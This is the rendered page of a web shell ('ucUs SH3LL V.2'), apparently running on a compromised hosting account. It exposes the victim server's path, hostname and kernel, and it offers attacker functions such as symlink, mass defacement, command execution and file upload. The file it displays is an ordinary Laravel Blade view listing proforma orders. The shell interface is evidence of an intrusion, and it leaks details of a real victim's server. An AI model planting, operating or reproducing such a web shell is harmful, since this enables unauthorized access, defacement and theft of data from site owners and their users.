Comming ucUs SH3LL V.2

Path : /home/gujo45me/public_html/survision/resources/views/proforma/
Disable Functions : exec,passthru,shell_exec,system
System : Linux server-604606.appsiete.com 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64

[ Home ][ Zone-h ][ Jumping ][ Symlink ][ Mass Depes ][ Command ]

File Upload :
Current File : /home/gujo45me/public_html/survision/resources/views/proforma/listar.blade.php

@extends('layout.main')
@section('content')

    <div class="sixteen wide tablet sixteen wide computer column ">
        <div class="ui segment">
            
            <h4 class="ui dividing header teal centered">LISTA DE PROFORMAS/PEDIDOS EMITIDOS</h4>
           
            <div class="ui equal width grid">
                <div class="row">
                    <div class="column">
                        <form id="frmBuscar" autocomplete="off" method="GET" action="{{ url('proforma/buscar') }}" >
                            <div class="ui action small input" >
                                  <input type="text" placeholder="Buscar..." name="search">
                                  <button type="submit" class="ui icon button " title="Clic para buscar"><i class="search icon"></i></button>
                            </div>
                        </form>
                    </div>
                    {{-- <div class="column export_files" style="text-align: right">
                        <div class="ui icon buttons" >
                            <button class="ui grey basic button" title="Clic para descargar en Excel"><i class="green large file excel outline icon"></i></button>
                            <button class="ui grey basic button" title="Clic para descargar en PDF"><i class="red large file pdf outline icon"></i></button>
                        </div>
                    </div> --}}
                </div>
            </div>

            <table class="ui celled striped table">
                <thead>
                    <tr>
                        <th class="head_table">N°</th>
                        <th class="head_table">Tipo</th>
                        <th class="head_table">Cliente</th>
                        <th class="head_table">Observacion</th>
                        <th class="head_table">Usuario</th>
                        <th class="head_table">Fecha</th>
                        <th class="head_table">Total S/</th>
                        <th class="head_table">Acciones</th>
                    </tr>
                </thead>
                <tbody>
                   <?php /**/ $i = $data->firstItem() /**/ ?>
                    @foreach ($data as $proforma)
                    <tr data-table="{{ $proforma->id_proforma }}">
                        <td>{{ $i }}</td>
                        <td>{{ $proforma->tipo }} N° {{ $proforma->id_proforma }}</td>
                        <td>{{ $proforma->nombre==null ? 'No especificado' : $proforma->nombre }}</td>
                        <td>{{ $proforma->observacion==null ? 'No especificado' : $proforma->observacion }}</td>
                        <td>{{ $proforma->usuario->username }}</td>
                        <td>{{ $proforma->created_at }}</td>
                        <td>{{ $proforma->total }}</td>
                        <td>                            
                            {{-- <div class="ui mini vertical animated positive button button_info_modal" title="Ver informacion detallada" data-id="{{ $venta->id_compra }}">
                                <div class="hidden content">Detalles</div>
                                <div class="visible content"><i class="search icon"></i></div>
                            </div> --}}
                            <a class="ui mini vertical animated blue button" title="Ver informacion detallada" href="{{ url('proforma/detalles/'.$proforma->id_proforma) }}">
                                <div class="hidden content">Detalles</div>
                                <div class="visible content"><i class="search icon"></i></div>
                            </a>
                           {{--  <div class="ui mini vertical animated red button button_delete_modal" title="Eliminar registro" data-id="{{ $venta->id_compra }}">
                                <div class="hidden content">Eliminar</div>
                                <div class="visible content"><i class="trash alternate icon"></i></div>
                            </div> --}}
                      
                        </td>
                    </tr>
                    <?php /**/ $i++ /**/ ?>
                    @endforeach
                </tbody>
                <tfoot>
                    <tr>
                        <th colspan="8">
                            @include('layout.includes.pagination')
                        </th>
                    </tr>
                </tfoot>
            </table>

        </div>
    </div>

@stop



Copyright © 2019 | Powered By MecUs7